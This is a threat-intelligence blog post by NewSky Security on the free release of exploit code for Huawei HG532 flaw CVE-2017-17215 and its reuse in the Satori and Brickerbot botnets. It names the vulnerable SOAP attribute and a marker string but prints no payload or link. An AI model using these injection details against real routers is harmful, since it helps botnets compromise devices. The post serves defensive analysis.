Huawei router exploit involved in Satori and Brickerbot given away for free on Christmas by…

Introduction

NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.

CVE-2017–17215, a vulnerability in Huawei HG532 devices, was discovered during a zero-day Satori attack by Checkpoint and was discreetly reported to Huawei for a fix. The proof of concept code was not made public to prevent attackers from abusing it. However, with the release of the full code now by the threat actor, we expect its usage in more cases by script kiddies and copy-paste botnet masters.

Exploit usage in Brickerbot and Satori Comparison

Interestingly, Satori is not the only botnet where this exploit has been implemented. Earlier in December, Brickerbot threat actor Janitor claimed to retire his project, and released a dump which contained snippets of Brickerbot source code. While analyzing this code, we also uncovered the usage of CVE-2017–17215, implying that this code has been in blackhats’ hands for a while. In the image below, we can see a snippet from leaked Brickerbot code, where we see command injection in <NewStatusURL> as well as “echo HUAWEIUPNP” in <NewDownloadURL> attributes of the SOAP request. This command injection is the very basis of CVE-2017–17215 vulnerability.

Let us compare this with a binary of Satori botnet (in the image below). Not only we see the same attack vector i.e. code injection in <NewStatusURL>, but also, we witness the other indicator “echo HUAWEIUPNP“ string, implying that both Satori and Brickerbot had copied the exploit source code from the same source.

All these indicators were also found in the working exploit code leaked on pastebin as shown below.

To avoid abuse potential, NewSky Security will not publish the pastebin link in this blog.

SOAP issues in the past

This is not the first time that IoT botnets are making use of issues related to the SOAP protocol. Earlier this year, we have observed several Mirai offshoots using two other SOAP bugs (CVE-2014–8361 and TR-64) which are code injections in <NewInternalClient> and <NewNTPServer> respectively. In the image below, we see a Mirai variant disassembly, where both exploits were used together to increase the chances of a successful attack.

When it comes to weaponized bugs related to the SOAP protocol, even Windows has not been untouched. We have already seen attacks related to CVE-2017–8759 where the root cause of analysis was MS Word invoking SOAP handler which further used WSDL, and a bug in the parsing caused code injection possible, resulting in weaponized RTF files.

Conclusion

IoT attacks are becoming modular day by day. When an IoT exploit becomes freely available, it hardly takes much time for threat actors to up their arsenal and implement the exploit as one of the attack vectors in their botnet code. Prior to the Huawei bug, NewSky Security already observed the leakage of NetGear router exploit (aka NbotLoader) which lead to that code being integrated in well-known botnet, Qbot.

To protect the devices against CVE-2017–17215, Huawei has released a security notice which can be accessed here.

Ankit Anubhav, Principal Researcher, NewSky Security (NewSky Security)